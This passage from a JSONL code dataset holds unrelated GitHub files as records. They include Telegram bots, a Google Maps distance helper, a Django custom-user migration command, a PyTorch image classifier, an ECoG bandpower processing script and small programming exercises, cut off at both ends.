InlineKeyboardButton(text=\"Close\", callback_data='btnClose')\nnot_accepted_request.add(btnAccept, btnClose)\n\naccepted_request = InlineKeyboardMarkup(row_width=2)\nbtnCompleted = InlineKeyboardButton(text=\"Completed\", callback_data='btnCompleted')\naccepted_request.add(btnCompleted, btnClose)\n","repo_name":"em7te/telegram_bot_registr","sub_path":"markup.py","file_name":"markup.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3538715799","text":"from opensimplex import OpenSimplex\nimport matplotlib.pyplot as plt\n\ndef heightmap(n):\n noise = OpenSimplex()\n z = [[0 for x in range(n)] for y in 
range(n)]\n for i in range(n):\n for j in range(n):\n z[i][j] = (noise.noise2d(((i + 1) / 10), ((j + 1) / 10)) + 1) * 10\n return z\n\nz = heightmap(100)\n\nmap = plt.imshow(z, cmap='terrain')\nplt.show()","repo_name":"enesdemirag/programming-exercises","sub_path":"exercises/materials/perlin-noise/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"77"} +{"seq_id":"11797553803","text":"\"\"\"\nInstructions to run script manually:\n1) launch django shell (./manage shell)\n2) import this module (from volt_finder import mygooglemaps as g)\n\"\"\"\n\nimport googlemaps\nfrom datetime import datetime\nimport json\nfrom dataclasses import dataclass\n\n# Settings used by Django\n#from django.conf import settings\n#gmaps = googlemaps.Client(key= settings.GOOGLE_API_KEY)\n\n# Settings to run script manually\nimport os\nGOOGLE_API_KEY = os.getenv('V2GO_GOOGLE_API_KEY')\ngmaps = googlemaps.Client(key= GOOGLE_API_KEY)\n\n# Transportation mode\nmymode = \"driving\" #\"transit\" # \"walking\"\njsonDumpDir = 'volt_finder/x_scrap_stuff/jsonDump.json'\nsampleCS = [\"160 Rue Saint Viateur E, Montréal, QC H2T 1A8\",\n \"145 Mont-Royal Ave E, Montreal, QC H2T 1N9\",\n \"1735 Rue Saint-Denis, Montréal, QC H2X 3K4\",\n \"2153 Mackay St, Montreal, QC H3G 2J2\",\n \"3515 Avenue Lacombe, Montréal, QC H3T 1M2\",\n \"5265 Queen Mary Rd, Montreal, QC H3W 1Y3\",\n \"191 Place du Marché-du-Nord, Montréal, QC H2S 1A2\",\n \"1999 Mont-Royal Ave E, Montreal, QC H2H 1J4\",\n \"545 Milton St, Montreal, QC H2X 1W5\",\n \"1999 Mont-Royal Ave E, Montreal, QC H2H 1J4\",\n \"432 Rue Rachel E, Montréal, QC H2J 2G7\"\n]\n\n\"\"\" Helpers \"\"\"\ndef printParams():\n print(\"--- Params ---\")\n print(\"Transport mode: \", mymode)\n print(\"Json dump directory: \", jsonDumpDir)\n print(\"Sample CS: \", sampleCS)\n\ndef dumpJsonFile(jdata):\n \"\"\" Takes a json or array and ourputs into a Json File \"\"\"\n with open(jsonDumpDir, 'w') as json_file:\n json.dump(jdata, json_file)\n return \"File saved\"\n\ndef printTripSummary(direc):\n \"\"\" Takes direction service outpu as input, prints summary info\"\"\"\n print(\"--- Trip Info ---\")\n print(\"From: \", direc[0][\"legs\"][0][\"start_address\"])\n print(\"To: \", direc[0][\"legs\"][0][\"end_address\"])\n print(\"Distance: \", direc[0][\"legs\"][0][\"distance\"][\"text\"])\n print(\"Duration: \", direc[0][\"legs\"][0][\"duration\"][\"text\"])\n\n@dataclass\nclass CStation:\n \"\"\"CStationnt of Interest data class, for Distance Matrix output\"\"\"\n nk: str\n destination_addresses: str\n duration_txt: str\n duration_val: int\n distance_txt: str\n distance_val: int\n status: str\n\n\ndef format_output_cs(addr, elem):\n # formated_cs = {\n # 'nk': 'err...whats that',\n # 'destination_addresses': addr,\n # 'duration_txt': elem['duration']['text'],\n # 'duration_val': elem['duration']['value'],\n # 'distance_txt': elem['distance']['text'],\n # 'distance_val': elem['distance']['value'],\n # 'status': elem['status'] \n # }\n # Use CStation data class object (requires serialization before the view Responds to client)\n formated_cs = CStation(\n 'no_nk',\n addr, \n elem['duration']['text'], \n elem['duration']['value'],\n elem['distance']['text'], \n elem['distance']['value'],\n elem['status']\n )\n return formated_cs\n \n\n \n\"\"\" Main func \"\"\"\n\ndef getDirections(departure, destination):\n \"\"\" \n Returns the directions to get from departure (A) to departure (B)\n 
Input: 2 locations (address or coordinates) as string \n    Output: JSON-formatted Directions, but as an array.\n    \"\"\"\n    now = datetime.now()\n    directions_result = gmaps.directions(\n        departure, destination, mode = mymode, departure_time = now)\n    return directions_result\n\ndef getNearestCS(poi, charginStations):\n    \"\"\" Gets the top X nearest CS from user provided location.\n    :param poi: the point of interest, a single location provided by the user \n    :param charginStations: array of CS locations \n    \"\"\"\n    resp = gmaps.distance_matrix(poi, charginStations)\n    \n    #TODO: replace this if /else for try/except\n    if resp['status']!='OK':\n        return \"Error\"\n    else:\n        result = []\n        for addr, elem in zip(resp['destination_addresses'], resp[\"rows\"][0]['elements']):\n            temp_CStation = format_output_cs(addr, elem)\n            result.append(temp_CStation)\n\n        # Sort CS by duration (lower first)\n        result.sort(key=lambda x: x.duration_val, reverse=False)\n\n        # Return top 5 results\n        if len(result) > 5:\n            return result[:5]\n        else:\n            return result \n\n","repo_name":"AdrianFerJ/v2go-api","sub_path":"django-server/api_django/volt_finder/mygooglemaps.py","file_name":"mygooglemaps.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29422958469","text":"def suma_divisores(x):\n    suma=0\n    for i in range(1,(x//2)+1):\n        if x%i==0:\n            suma+=i\n    return suma\n\ndef amigos(x,y):\n    if x == suma_divisores(y) and y == suma_divisores(x):\n        return True\n    else:\n        return False\n\nif __name__==\"__main__\":\n    a=int(input(\"Ingrese un numero: \"))\n    b=int(input(\"Ingrese otro numero:\"))\n    print(amigos(a,b))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej2/tema2_ej2_frvega.py","file_name":"tema2_ej2_frvega.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29136965693","text":"from telegram.ext import *\nfrom telegram import *\nimport logging\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    level=logging.INFO)\ntoken = os.getenv('BOT_TOKEN')\nupdater = Updater(token=token, use_context=True)\ndispatcher = updater.dispatcher\n\ncurrent_user = {}\nCLASS_DATA = {}\nCLASS_PART = {}\nCLASS_CODES = {\"T15\": \"9210\",\n               \"T16\": \"9211\"}\nALL_CLASSES = [\"T15\", \"T16\"]\n\nfor c in ALL_CLASSES:\n    CLASS_DATA[c] = []\n    CLASS_PART[\"participation_\" + c] = []\n\ndef start(update, context):\n    buttons = []\n    for each_class in ALL_CLASSES:\n        buttons.append([InlineKeyboardButton(\"Register Attendance for \" + each_class, callback_data=each_class)])\n        buttons.append([InlineKeyboardButton(\"Register Participation for \" + each_class, callback_data=\"participation_\" + each_class)])\n    context.bot.send_message(chat_id=update.effective_chat.id, text=\"What may I do for you today?\",\n                             reply_markup=InlineKeyboardMarkup(buttons))\n\ndef write_to_txt(tut, type):\n    if type == \"T\":\n        file = open(tut + \".txt\", \"w+\")\n        for name in CLASS_DATA[tut]:\n            file.write(name + \"\\n\")\n    else:\n        file = open(tut + \"Part.txt\", \"w+\")\n        for name in CLASS_PART[\"participation_\" + tut]:\n            file.write(name + \"\\n\")\n\ndef inline_query(update, context):\n    query = update.callback_query.data\n    update.callback_query.answer()\n    context.bot.edit_message_reply_markup(\n        message_id = update.callback_query.message.message_id,\n        chat_id = 
update.callback_query.message.chat.id,\n        reply_markup=None)\n    current_user[update.effective_chat.id] = {}\n    if query.startswith(\"participation_\"):\n        current_user[update.effective_chat.id]['class'] = query.split(\"_\")[1]\n    else:\n        current_user[update.effective_chat.id]['class'] = query\n    if query.startswith(\"participation_\"):\n        current_user[update.effective_chat.id]['state'] = \"participation\"\n        context.bot.send_message(chat_id=update.effective_chat.id,\n                             text=\"Please type in your name.\")\n    else:\n        context.bot.send_message(chat_id=update.effective_chat.id,\n                             text=\"Please type in the code followed by your name\\nE.g. 1001 William Lee\")\n\ndef message_handler(update, context):\n    global current_user\n    if current_user.get(update.effective_chat.id) is None or current_user[update.effective_chat.id].get('class') is None:\n        context.bot.send_message(chat_id=update.effective_chat.id, text=\"If you'd like to register your attendance, please choose your class first.\")\n        return\n    msg = update.message.text\n    curr_class = current_user[update.effective_chat.id]['class']\n    if current_user[update.effective_chat.id].get('state') == \"participation\":\n        CLASS_PART[\"participation_\" + curr_class].append(msg)\n        CLASS_PART[\"participation_\" + curr_class].sort()\n        write_to_txt(curr_class, \"P\")\n        context.bot.send_message(chat_id=update.effective_chat.id, text=msg + \" registered!\")\n        current_user[update.effective_chat.id]['state'] = \"registered_participation\"\n    else:\n        password = CLASS_CODES.get(curr_class)\n        if msg.startswith(password):\n            name = msg.split(password + \" \")[1]\n            CLASS_DATA[curr_class].append(name)\n            CLASS_DATA[curr_class].sort()\n            write_to_txt(curr_class, \"T\")\n            context.bot.send_message(chat_id=update.effective_chat.id, text=name + \" registered!\")\n            print(\"Total: \" + str(len(CLASS_DATA[curr_class])))\n        else:\n            context.bot.send_message(chat_id=update.effective_chat.id, text=\"Wrong code/format, include a space after the code if you forgot to.\")\n\nstart_handler = CommandHandler('start', start)\ndispatcher.add_handler(start_handler)\n\nquery_handler = CallbackQueryHandler(inline_query)\ndispatcher.add_handler(query_handler)\n\ncatchall_handler = MessageHandler(Filters.text, message_handler)\ndispatcher.add_handler(catchall_handler)\n\nupdater.start_polling()\nupdater.idle()\n","repo_name":"seanmanik/Attendance-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17497201236","text":"from __future__ import absolute_import, unicode_literals\n\nimport inspect\n\nfrom django.apps import apps\nfrom django.core.management.base import BaseCommand\nfrom django.db import models\nfrom django.db.migrations import Migration\nfrom django.db.migrations.autodetector import MigrationAutodetector\nfrom django.db.migrations.loader import MigrationLoader\nfrom django.db.migrations.state import ProjectState\nfrom django.db.migrations.writer import MigrationWriter\n\nfrom django_custom_user_migration.utils import (empty_table, fetch_with_column_names, get_max_id,\n                                                make_table_name, populate_table, reset_sequence)\n\n\nclass CustomUserCommand(BaseCommand):\n\n    def add_arguments(self, parser):\n        parser.add_argument(\"source_model\")\n        parser.add_argument(\"destination_model\")\n\n    def handle(self, *args, **options):\n        source_model = options['source_model']\n        destination_model = options['destination_model']\n        from_app_label, from_model_name = 
source_model.split(\".\")\n to_app_label, to_model_name = destination_model.split(\".\")\n self.handle_custom_user(from_app_label, from_model_name, to_app_label, to_model_name)\n\n def create_runpython_migration(self, app_label, forwards_backwards, extra_functions,\n extra_dependencies=None):\n\n # Copy source code, so that we can uninstall this helper app\n # and the migrations still work.\n extra_func_code = \"\\n\\n\".join(inspect.getsource(f)\n for f in extra_functions)\n\n loader = MigrationLoader(None, ignore_no_migrations=True)\n autodetector = MigrationAutodetector(\n loader.project_state(),\n ProjectState.from_apps(apps),\n None,\n )\n\n changes = {\n app_label: [Migration(\"custom\", app_label)]\n }\n changes = autodetector.arrange_for_graph(\n changes=changes,\n graph=loader.graph,\n )\n\n for app_label, app_migrations in changes.items():\n for migration in app_migrations:\n if extra_dependencies is not None:\n migration.dependencies.extend(extra_dependencies)\n writer = MigrationWriter(migration)\n\n migration_string = writer.as_string().decode('utf-8')\n\n # Add support functions:\n migration_string = migration_string.replace(\"\\nclass Migration\",\n forwards_backwards + \"\\n\\n\" +\n extra_func_code + \"\\n\\n\" +\n \"\\nclass Migration\")\n\n # Add operations:\n migration_string = migration_string.replace(\n \"operations = [\",\n \"operations = [\\n\"\n \" migrations.RunPython(forwards, backwards),\")\n with open(writer.path, \"wb\") as fh:\n fh.write(migration_string.encode('utf-8'))\n\n\nclass CustomUserPopulateCommand(CustomUserCommand):\n\n def create_populate_migration(self, from_app_label, from_model_name,\n to_app_label, to_model_name, reverse=False):\n populate_template = \"\"\"\n populate_table(apps, schema_editor,\n \"{from_app}\", \"{from_model}\",\n \"{to_app}\", \"{to_model}\")\"\"\"\n empty_template = \"\"\"\n empty_table(apps, schema_editor,\n \"{to_app}\", \"{to_model}\")\"\"\"\n\n forwards_backwards_template = \"\"\"\ndef forwards(apps, schema_editor):{forwards}\n\n\ndef backwards(apps, schema_editor):{backwards}\n\"\"\"\n\n from_model = apps.get_model(from_app_label, from_model_name)\n to_model = apps.get_model(to_app_label, to_model_name)\n if reverse:\n from_model, to_model = to_model, from_model\n\n # We need to populate the model table, but also the automatically\n # created M2M tables from the corresponding table on the source model\n model_pairs = [((from_model._meta.app_label, from_model.__name__),\n (to_model._meta.app_label, to_model.__name__))]\n\n for from_f in from_model._meta.get_fields(include_hidden=True):\n if not isinstance(from_f, models.ManyToManyField):\n continue\n to_f = to_model._meta.get_field(from_f.name)\n\n # When auth.User has been swapped out, the f.rel.through attribute\n # becomes None. So we have to build the name manually.\n make_name = lambda f: \"{0}_{1}\".format(f.model.__name__, f.name)\n model_pairs.append(((from_model._meta.app_label, make_name(from_f)),\n (to_model._meta.app_label, make_name(to_f))))\n\n populate = \"\"\n empty = \"\"\n for ((from_a, from_m), (to_a, to_m)) in model_pairs:\n populate += populate_template.format(\n from_app=from_a,\n from_model=from_m,\n to_app=to_a,\n to_model=to_m,\n )\n\n # Empty in reverse order i.e. 
M2M tables first\n for ((from_a, from_m), (to_a, to_m)) in reversed(model_pairs):\n empty += empty_template.format(\n from_app=from_a,\n from_model=from_m,\n to_app=to_a,\n to_model=to_m,\n )\n\n if not reverse:\n data = {'forwards': populate,\n 'backwards': empty,\n }\n else:\n data = {'forwards': empty,\n 'backwards': populate,\n }\n forwards_backwards = forwards_backwards_template.format(**data)\n\n self.create_runpython_migration(to_app_label, forwards_backwards,\n [populate_table, empty_table, make_table_name,\n fetch_with_column_names, get_max_id,\n reset_sequence])\n","repo_name":"spookylukey/django_custom_user_migration","sub_path":"django_custom_user_migration/management/commands/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"39723845404","text":"\ndef paper(dims):\n l, w, h = dims\n return 2*l*w + 2*w*h + 2*l*h + min(l*w, w*h, l*h)\n\ndef ribbon(dims):\n l, w, h = dims\n return l*w*h + min(2*(l+w), 2*(w+h), 2*(l+h))\n\nif __name__ == \"__main__\":\n with open('day02/input.txt') as f:\n all_dims = list(tuple(map(int, line.split('x'))) for line in f.read().splitlines())\n\n print('--- Part 1 ---')\n print(sum(paper(dims) for dims in all_dims))\n print('--- Part 2 ---')\n print(sum(ribbon(dims) for dims in all_dims))\n","repo_name":"drewhayward/advent-of-code-2015","sub_path":"day02/paper.py","file_name":"paper.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8556240990","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import models\nimport pretrainedmodels\nimport easydict as edict\nimport numpy as np\n# from efficientnet_pytorch import EfficientNet \n\nimport os\nimport models.pooling as pooling\nfrom models.metric_learning import *\nfrom models.resnet import *\nfrom models.densenet import *\nfrom models.efficient import *\n\nclass AdaptiveConcatPool2d(nn.Module):\n def __init__(self):\n super().__init__()\n self.ap = nn.AdaptiveAvgPool2d(1)\n self.mp = nn.AdaptiveMaxPool2d(1)\n def forward(self, x): return torch.cat([self.mp(x), self.ap(x)], 1)\n\n\nclass Flatten(nn.Module):\n def __init__(self): super().__init__()\n def forward(self, x): return x.view(x.size(0), -1) \n\n\ndef create_new_conv(trained_kernel):\n trained_kernel_weights = trained_kernel.weight \n\n new_conv = nn.Conv2d(in_channels=6, \n out_channels=trained_kernel.out_channels, \n kernel_size=trained_kernel.kernel_size, \n stride=trained_kernel.stride, \n padding=trained_kernel.padding, \n bias=False)\n\n with torch.no_grad():\n new_conv.weight[:,:] = torch.stack([torch.mean(trained_kernel_weights, 1)]*6, dim=1)\n\n return new_conv\n\ndef resnet_remove_head(backbone): \n # change first filter\n trained_kernel = backbone.conv1\n backbone.conv1 = create_new_conv(trained_kernel)\n\n # get in_features\n final_in_features = backbone.fc.in_features \n\n # remove head\n backbone = nn.Sequential(*list(backbone.children())[:-2])\n\n return backbone, final_in_features\n\n\ndef desnet_remove_head(backbone):\n trained_kernel = backbone.features.conv0 \n backbone.features.conv0 = create_new_conv(trained_kernel)\n\n final_in_features = backbone.classifier.in_features\n\n backbone = nn.Sequential(*list(backbone.features)[:-1])\n\n return backbone, final_in_features\n\n\ndef effnet_remove_head(backbone, model_name): \n trained_kernel = 
backbone._conv_stem\n\n trained_kernel_weights = trained_kernel.weight \n\n new_conv = Conv2dStaticSamePadding(in_channels=6, \n out_channels=trained_kernel.out_channels, \n kernel_size=trained_kernel.kernel_size, \n stride=trained_kernel.stride,\n image_size=EfficientNet.get_image_size(model_name),\n bias=False)\n \n with torch.no_grad():\n new_conv.weight[:,:] = torch.stack([torch.mean(trained_kernel_weights, 1)]*6, dim=1)\n\n backbone._conv_stem = new_conv\n\n final_in_features = backbone._fc.in_features\n\n # backbone = nn.Sequential(*list(backbone.children())[:-2])\n\n return backbone, final_in_features \n\n\nclass RecursionNet(nn.Module):\n\n def __init__(self, num_classes, model_name='resnet18', \n fc_dim=512, loss_module='softmax', antialias=True, filter_size=5):\n super(RecursionNet, self).__init__() \n \n if antialias: # only supports resnet18's weights\n self.backbone = globals().get(model_name)(filter_size=filter_size)\n\n file_name = 'weights/{0}_lpf{1}.pth.tar'.format(model_name, filter_size)\n if not os.path.exists(file_name):\n raise ValueError('Weights not available!')\n \n if torch.cuda.is_available(): \n self.backbone.load_state_dict(torch.load(file_name)['state_dict'])\n else:\n self.backbone.load_state_dict(torch.load(file_name, map_location=torch.device('cpu'))['state_dict'])\n\n if 'resnet' in model_name:\n self.backbone, final_in_features = resnet_remove_head(self.backbone)\n elif 'dense' in model_name:\n self.backbone, final_in_features = desnet_remove_head(self.backbone)\n else:\n raise ValueError('Only resnet and densenet121 supported for antialias!')\n \n else:\n if 'dense' in model_name:\n self.backbone = getattr(pretrainedmodels, model_name)(num_classes=1000) \n self.backbone, final_in_features = desnet_remove_head(self.backbone)\n\n elif 'efficient' in model_name:\n raise NotImplementedError\n # self.backbone = EfficientNet.from_pretrained(model_name, num_classes=num_classes)\n # self.backbone, final_in_features = effnet_remove_head(self.backbone, model_name)\n\n elif 'resnet' in model_name:\n raise NotImplementedError\n\n else:\n raise ValueError('Only densenet and efficientnet supported!')\n \n self.pooling = AdaptiveConcatPool2d()\n self.flatten = Flatten() \n self.bn1 = nn.BatchNorm1d(final_in_features * 2)\n self.fc1 = nn.Linear(final_in_features * 2, final_in_features)\n self.relu = nn.ReLU(inplace=True)\n self.bn2 = nn.BatchNorm1d(final_in_features) \n self.dropout1 = nn.Dropout(p=0.25)\n self._init_params() \n\n if loss_module == 'arcface':\n self.final = ArcMarginProduct(final_in_features, num_classes)\n elif loss_module == 'cosface':\n self.final = AddMarginProduct(final_in_features, num_classes)\n elif loss_module == 'adacos':\n self.final = AdaCos(final_in_features, num_classes)\n elif loss_module == 'sphereface':\n self.final = SphereProduct(final_in_features, num_classes)\n elif loss_module == 'amsoftmax':\n self.final = AdaptiveMargin(final_in_features, num_classes)\n else:\n self.final = nn.Linear(final_in_features, num_classes)\n\n def _init_params(self):\n nn.init.kaiming_normal_(self.fc1.weight)\n nn.init.constant_(self.fc1.bias, 0)\n nn.init.constant_(self.bn1.weight, 1)\n nn.init.constant_(self.bn1.bias, 0)\n nn.init.constant_(self.bn2.weight, 1)\n nn.init.constant_(self.bn2.bias, 0)\n \n def forward(self, x): \n feature = self.extract_feat(x)\n logits = self.final(feature)\n return logits\n # return feature\n\n def extract_feat(self, x):\n x = self.backbone(x)\n x = self.pooling(x)\n x = self.flatten(x) \n x = self.bn1(x)\n x = 
self.fc1(x)\n x = self.relu(x) \n x = self.bn2(x)\n x = self.dropout1(x)\n return x\n\ndef get_model(config):\n num_classes = config.model.num_classes\n model_name = config.model.arch\n fc_dim = config.model.fc_dim\n loss_module = config.loss.name\n antialias = config.model.antialias\n\n net = RecursionNet(num_classes=num_classes, model_name=config.model.arch,\n fc_dim=fc_dim, loss_module=loss_module, antialias=antialias)\n \n return net","repo_name":"wjensheng/recursion","sub_path":"models/model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":7059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"14103669285","text":"\"\"\"\nTop-level trial data bandpower processing\n\nAuthored by Eric Easthope\n\"\"\"\n\nimport os\nimport warnings\nimport numpy as np\nimport scipy.signal as sig\nimport resampy\nimport multiprocess as mp\nfrom pathlib import Path\nfrom utils import log_scale_bands\n\n# Filter warnings\nwarnings.filterwarnings(\"ignore\")\n\nDATA = \"data\"\nDERIVED = \"derived\"\nsubjects = [\"EC2\", \"EC9\", \"GP31\", \"GP33\"]\nBANDS = (\n log_scale_bands(12, 35, 2)\n + log_scale_bands(35, 70, 2)\n + log_scale_bands(70, 140, 2)\n)\n\nMIN_REST_LENGTH = 0.5\nOVERWRITE = True\nfs = 3052\nnyq = fs // 2\nr = int(MIN_REST_LENGTH * fs)\npad = int(0.5 * fs)\n\n# Average consonant/vowel length, cross-session\navg_consonant_len = np.concatenate(\n [\n [c for c in np.load(p, allow_pickle=True) if c is not None]\n for p in Path(DERIVED).glob(f\"*/**/*-ee-consonants.npy\")\n ]\n).mean()\navg_vowel_len = np.concatenate(\n [\n [v for v in np.load(p, allow_pickle=True) if v is not None]\n for p in Path(DERIVED).glob(f\"*/**/*-ee-vowels.npy\")\n ]\n).mean()\n\nfor SUBJECT in subjects:\n for path in [p for p in Path(DATA).glob(f\"{SUBJECT}*.nwb\")]:\n _, SESSION = path.stem.split(\"_\")\n OUT = DERIVED + f\"/{SUBJECT}/{SESSION}\"\n print(f\"File {SUBJECT}_{SESSION}.\")\n\n if os.path.isdir(f\"{OUT}/powers\") and not OVERWRITE:\n print(\"Powers exist already, skipping ...\")\n else:\n # LOAD\n cx = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-consonants.npy\",\n allow_pickle=True,\n )\n vx = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-vowels.npy\",\n allow_pickle=True,\n )\n idx = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-indices.npy\",\n allow_pickle=True,\n )\n goods = np.load(\n f\"{OUT}/{SUBJECT}_{SESSION}-good-channels.npy\",\n allow_pickle=True,\n )\n epochs = np.load(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-epochs.npy\",\n allow_pickle=True,\n )\n\n # RE-REFERENCE, subtract average signal from each channel\n def rereference(s):\n return (s.T - s[:, goods].mean(axis=1)).T\n\n # NOTCH FILTER, 60/120/180 Hz line noise\n def notch(s, Hz):\n # NOTCH FILTER\n Q = 30\n b, a = sig.iirnotch(Hz, Q=Q, fs=fs)\n return sig.filtfilt(b, a, s, axis=0)\n\n # BANDPASS FILTER\n def bandpass(s, band):\n # BANDPASS FILTER\n [l, h] = band\n low = l / nyq\n high = h / nyq\n ORDER = 3\n sos = sig.butter(ORDER, [low, high], \"band\", analog=False, output=\"sos\")\n return sig.sosfiltfilt(sos, s, axis=0)\n\n # ANALYTIC SIGNAL, Hilbert transform\n def analytic(s):\n return sig.hilbert(s, axis=0)\n\n # POWER\n def power(s):\n return np.abs(s) ** 2.0\n\n # STRETCH, Time-warp consonant/vowel to average lengths w/ sinc interpolation\n def stretch(s, i):\n [pad1, irp1, con, vow, irp2, pad2] = np.split(s, i[1:-1])\n [rest1, start, cv, stop, rest2] = i[1:-1]\n\n c_scale = fs * avg_consonant_len 
/ len(con)\n v_scale = fs * avg_vowel_len / len(vow)\n\n c_fs = np.floor(fs * c_scale).astype(int)\n v_fs = np.floor(fs * v_scale).astype(int)\n c_pad = np.floor(pad * c_scale).astype(int)\n v_pad = np.floor(pad * v_scale).astype(int)\n\n c_stretched = resampy.resample(\n s[start - pad : cv + pad],\n fs,\n c_fs,\n filter=\"sinc_window\",\n axis=0,\n )[c_pad:-c_pad]\n v_stretched = resampy.resample(\n s[cv - pad : stop + pad],\n fs,\n v_fs,\n axis=0,\n filter=\"sinc_window\",\n )[v_pad:-v_pad]\n\n return np.concatenate(\n [pad1, irp1, c_stretched, v_stretched, irp2, pad2]\n ), np.cumsum(\n [\n 0,\n len(pad1),\n len(irp1),\n len(c_stretched),\n len(v_stretched),\n len(irp2),\n len(pad2),\n ]\n )\n\n # Total process\n def process(e, i, low, high):\n return (\n stretch(\n power(\n analytic(\n bandpass(\n notch(notch(notch(rereference(e), 60), 120), 180),\n [low, high],\n )\n )\n ),\n i,\n )\n if e is not None and i is not None\n else (None, None)\n )\n\n # Make powers directory if it does not exist\n try:\n os.mkdir(f\"{OUT}/powers\")\n except FileExistsError:\n pass\n\n for (low, high) in BANDS:\n l = np.ceil(low).astype(int)\n h = np.ceil(high).astype(int)\n print(f\"{l}-{h} Hz ...\")\n with mp.Pool(processes=8) as pool:\n results = pool.starmap(\n process,\n [(epochs[i], idx[i], low, high) for i in range(len(epochs))],\n )\n powers, indices = zip(*results)\n np.save(\n f\"{OUT}/powers/{SUBJECT}_{SESSION}-powers-ee-{l}-{h}.npy\",\n powers,\n allow_pickle=True,\n )\n np.save(\n f\"{OUT}/trials/{SUBJECT}_{SESSION}-trials-ee-indices-stretched.npy\",\n indices,\n allow_pickle=True,\n )\n\n print(\"Done.\")\n print()\n","repo_name":"ericeasthope/as-in-ecog","sub_path":"process-epochs.py","file_name":"process-epochs.py","file_ext":"py","file_size_in_byte":6351,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"34060101513","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 26 21:49:54 2019\n\n@author: Will\n\"\"\"\n\nnum=float(input(\"Give a decimal number between 0 and 1: \"))\np=0\nwhile ((2**p)*num)%2!=0:\n p+=1\nnumber=int((2**p)*num)\nresult=\"\"\nwhile number>0:\n result=str(number%2)+result\n number=number//2\nfinal_result=int(result)/(10**p)\nprint(final_result)","repo_name":"cuichacha/MIT-6.00.1x","sub_path":"Week 2: Simple Programs/3. 
Simple Algorithms/convert float to binary.py","file_name":"convert float to binary.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39335818167","text":"import torch\r\nimport numpy as np\r\n\r\nfrom typing import List, Optional\r\nfrom torch.utils.data import DataLoader\r\nfrom Core.Constants import CoNLL_BIO\r\nfrom Core.Util import one_hot\r\n\r\n\r\nclass Dataset(torch.utils.data.Dataset):\r\n    def __init__(self,\r\n                 text: List[str],\r\n                 embs: List[torch.Tensor],\r\n                 lbs: List[List[str]]\r\n                 ):\r\n        \"\"\"\r\n        A wrapper class to create syntax dataset for syntax expansion training.\r\n        \"\"\"\r\n        super().__init__()\r\n        self._embs = embs\r\n        self._text = text\r\n        self._lbs = lbs\r\n\r\n    @property\r\n    def n_insts(self):\r\n        \"\"\" Property for dataset size \"\"\"\r\n        return len(self._text)\r\n\r\n    def __len__(self):\r\n        return self.n_insts\r\n\r\n    def __getitem__(self, idx):\r\n        return self._text[idx], self._embs[idx], self._lbs[idx]\r\n\r\n\r\ndef batch_prep(emb_list: List[torch.Tensor],\r\n               lbs_list: Optional[List[List[str]]],\r\n               txt_list: Optional[List[List[str]]] = None):\r\n    \"\"\"\r\n    Pad the instances to the max sequence length in the batch\r\n    \"\"\"\r\n    for emb, txt, lbs in zip(emb_list, txt_list, lbs_list):\r\n        assert len(emb) == len(txt) == len(lbs)\r\n    d_emb = emb_list[0].size(-1)\r\n    seq_lens = [len(emb) for emb in emb_list]\r\n    max_seq_len = np.max(seq_lens)\r\n\r\n    emb_batch = torch.stack([\r\n        torch.cat([inst, torch.zeros([max_seq_len-len(inst), d_emb])], dim=-2) for inst in emb_list\r\n    ])\r\n\r\n    lbs_batch = np.array([\r\n        inst + [-1] * (max_seq_len - len(inst))\r\n        for inst in lbs_list\r\n    ])\r\n\r\n    lbs_batch = torch.tensor(lbs_batch, dtype=torch.long)\r\n    seq_lens = torch.tensor(seq_lens, dtype=torch.long)\r\n\r\n    return emb_batch, lbs_batch, seq_lens, txt_list\r\n\r\n\r\ndef collate_fn(insts):\r\n    \"\"\"\r\n    Principle used to construct dataloader\r\n\r\n    :param insts: original instances\r\n    :return: padded instances\r\n    \"\"\"\r\n    txt, embs, lbs = list(zip(*insts))\r\n    batch = batch_prep(emb_list=embs, lbs_list=lbs, txt_list=txt)\r\n    return batch\r\n","repo_name":"dreamyang-liu/Neural-HMM","sub_path":"Legacy/CoNLL03/MMData.py","file_name":"MMData.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29395706079","text":"#La función debe retornar la distancia como un string\n# +1 : si la distancia es mayor que 1\n# IB : si la distancia es 1, y para llegar de una palabra a la otra hay que\n# insertar o borrar una letra\n# 1S : si la distancia es 1 porque hay que sustituir una letra\n# 0D : si las palabras son iguales\n\n\ndef levenshtein(p1,p2):\n    x = len(p1)\n    y = 